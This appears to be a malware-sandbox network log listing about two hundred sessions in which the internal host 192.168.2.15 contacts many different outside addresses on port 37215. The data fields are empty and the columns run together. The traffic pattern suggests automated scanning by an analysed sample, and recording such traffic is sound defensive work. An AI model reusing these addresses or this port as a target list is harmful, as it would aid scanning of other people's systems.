                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22774192.168.2.1553024156.246.26.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22775192.168.2.1541320156.114.97.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22776192.168.2.1557278156.204.233.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22777192.168.2.1548168156.187.181.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22778192.168.2.1552132156.10.5.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22779192.168.2.1541096156.55.193.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22780192.168.2.1560132156.143.129.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22781192.168.2.1557028156.44.137.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22782192.168.2.1536894156.134.222.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22783192.168.2.1538644156.49.6.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22784192.168.2.1546682156.80.149.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22785192.168.2.1545632156.220.30.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22786192.168.2.1552046156.165.206.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22787192.168.2.1552940156.217.187.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22788192.168.2.1548620156.98.226.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22789192.168.2.1557700156.143.77.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22790192.168.2.1550432156.44.129.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22791192.168.2.1555596156.196.197.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22792192.168.2.1557734156.152.133.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22793192.168.2.1546556156.232.189.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22794192.168.2.1539496156.11.154.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22795192.168.2.1534326156.171.70.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22796192.168.2.1551730156.87.49.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22797192.168.2.1535070156.199.147.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22798192.168.2.1544396156.61.37.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22799192.168.2.1547462156.228.31.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22800192.168.2.1544052156.21.217.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22801192.168.2.1535026156.173.8.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22802192.168.2.1555752156.146.208.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22803192.168.2.1534964156.61.223.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22804192.168.2.1545770156.204.121.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22805192.168.2.1559706156.253.126.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22806192.168.2.1533080156.59.148.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22807192.168.2.1553356156.203.36.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22808192.168.2.1532832156.176.53.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22809192.168.2.1546070156.172.102.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22810192.168.2.1550670156.170.149.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22811192.168.2.1533572156.108.32.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22812192.168.2.1538456156.146.211.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22813192.168.2.1548242156.33.213.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22814192.168.2.1548628156.51.71.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22815192.168.2.1551856156.70.67.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22816192.168.2.1547824156.121.225.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22817192.168.2.1540582156.202.184.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22818192.168.2.1550810156.192.104.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22819192.168.2.1556866156.230.54.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22820192.168.2.1535608156.166.40.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22821192.168.2.1556708156.65.13.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22822192.168.2.155470841.2.92.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22823192.168.2.154665441.23.116.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22824192.168.2.154501841.91.63.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22825192.168.2.154079841.211.95.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22826192.168.2.153415641.90.230.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22827192.168.2.155617641.170.84.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22828192.168.2.155120641.161.214.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22829192.168.2.154973441.212.12.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22830192.168.2.153791441.160.185.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22831192.168.2.153508041.177.124.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22832192.168.2.154712441.197.143.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22833192.168.2.153456441.229.57.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22834192.168.2.156007041.14.109.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22835192.168.2.153477041.207.239.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22836192.168.2.154480441.29.59.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22837192.168.2.154267241.68.84.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22838192.168.2.153366841.189.253.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22839192.168.2.153326441.0.20.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22840192.168.2.155556241.211.52.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22841192.168.2.153436841.211.237.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22842192.168.2.154534041.11.193.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22843192.168.2.155324641.213.213.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22844192.168.2.155255241.50.75.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22845192.168.2.156097041.32.186.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22846192.168.2.155743641.136.158.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22847192.168.2.155736641.42.42.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22848192.168.2.155197641.1.255.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22849192.168.2.154608641.195.147.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22850192.168.2.154781441.128.4.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22851192.168.2.153999041.158.234.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22852192.168.2.154014441.39.28.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22853192.168.2.154860241.74.155.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22854192.168.2.155961241.219.173.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22855192.168.2.153858241.123.9.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22856192.168.2.154918841.103.139.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22857192.168.2.154577841.106.127.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22858192.168.2.154832241.152.172.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22859192.168.2.154929841.81.93.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22860192.168.2.155177641.136.144.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22861192.168.2.153677041.102.172.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22862192.168.2.156050841.129.95.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22863192.168.2.153880841.55.115.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22864192.168.2.154982641.87.34.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22865192.168.2.155888841.214.49.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22866192.168.2.154203041.219.9.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22867192.168.2.154206241.185.251.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22868192.168.2.155479241.221.54.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22869192.168.2.155389841.153.181.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22870192.168.2.155532241.6.83.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22871192.168.2.154161441.228.15.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22872192.168.2.155537441.198.250.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22873192.168.2.155825241.131.86.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22874192.168.2.155741041.40.170.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22875192.168.2.154852041.35.60.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22876192.168.2.155698641.75.222.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22877192.168.2.154965841.226.87.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22878192.168.2.155161841.23.232.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22879192.168.2.153387241.101.159.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22880192.168.2.153656441.119.87.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22881192.168.2.156087041.23.79.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22882192.168.2.155553041.145.66.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22883192.168.2.155030041.180.232.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22884192.168.2.153283641.56.226.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22885192.168.2.153343841.132.112.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22886192.168.2.155920441.144.210.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22887192.168.2.155665641.167.159.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22888192.168.2.155758241.81.197.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22889192.168.2.155519641.66.96.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22890192.168.2.155090641.127.27.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22891192.168.2.155203041.68.175.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22892192.168.2.153771241.128.181.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22893192.168.2.155082641.232.28.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22894192.168.2.154768641.148.236.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22895192.168.2.155014841.32.159.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22896192.168.2.154045041.15.237.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22897192.168.2.153925641.100.98.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22898192.168.2.154047441.51.44.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22899192.168.2.154330441.196.83.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22900192.168.2.154263441.238.211.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22901192.168.2.154759441.124.230.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22902192.168.2.153876641.26.132.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22903192.168.2.155649441.90.196.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22904192.168.2.153922641.172.160.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22905192.168.2.153596641.104.63.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22906192.168.2.153688241.21.4.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22907192.168.2.155361841.185.193.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22908192.168.2.154226041.92.81.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22909192.168.2.155393041.151.233.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22910192.168.2.155329441.49.109.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22911192.168.2.156007041.54.120.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22912192.168.2.155605041.175.125.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22913192.168.2.156003441.16.98.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22914192.168.2.153930841.252.84.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22915192.168.2.155178041.57.205.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22916192.168.2.155380841.111.41.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22917192.168.2.153394641.180.143.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22918192.168.2.153647241.221.168.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22919192.168.2.153485641.105.26.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22920192.168.2.155670241.124.250.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22921192.168.2.153771641.12.50.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22922192.168.2.153586041.217.159.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22923192.168.2.155879241.45.0.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22924192.168.2.155523041.110.145.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22925192.168.2.154830641.139.255.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22926192.168.2.153361041.84.142.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22927192.168.2.154911241.101.71.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22928192.168.2.154578241.115.148.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22929192.168.2.155484441.10.208.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22930192.168.2.154383841.223.10.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22931192.168.2.155139441.118.90.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22932192.168.2.154656041.179.35.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22933192.168.2.155646441.171.144.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22934192.168.2.153419041.78.244.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22935192.168.2.155777041.222.197.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22936192.168.2.154649241.182.255.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22937192.168.2.154438441.2.174.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22938192.168.2.155177841.209.97.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22939192.168.2.155983641.115.159.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22940192.168.2.154085841.51.76.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22941192.168.2.155575841.248.125.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22942192.168.2.154486241.161.100.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22943192.168.2.155502241.81.91.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22944192.168.2.154367841.66.198.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22945192.168.2.156090241.210.153.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22946192.168.2.154847641.49.85.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22947192.168.2.153477641.119.29.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22948192.168.2.155239241.160.61.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22949192.168.2.153372441.106.58.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22950192.168.2.153477241.2.193.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22951192.168.2.155606041.3.225.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22952192.168.2.155731841.147.140.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22953192.168.2.153890641.128.162.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22954192.168.2.154723441.242.37.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22955192.168.2.154400441.81.32.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22956192.168.2.155969641.29.129.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22957192.168.2.155995641.199.131.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22958192.168.2.155321441.254.97.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22959192.168.2.153688241.215.119.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22960192.168.2.155529641.249.126.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22961192.168.2.154656641.155.87.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22962192.168.2.154823441.135.119.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22963192.168.2.155704441.240.49.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22964192.168.2.153917841.30.65.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22965192.168.2.155215041.224.99.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22966192.168.2.154566241.252.23.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22967192.168.2.154859841.185.215.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22968192.168.2.153624241.180.238.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22969192.168.2.154675041.212.21.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22970192.168.2.155421241.107.165.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22971192.168.2.154172041.154.218.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22972192.168.2.154654441.122.250.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22973192.168.2.154783841.227.192.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22974192.168.2.155397841.7.243.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22975192.168.2.155914641.216.168.18637215
                                                                            TimestampBytes transferredDirectionData


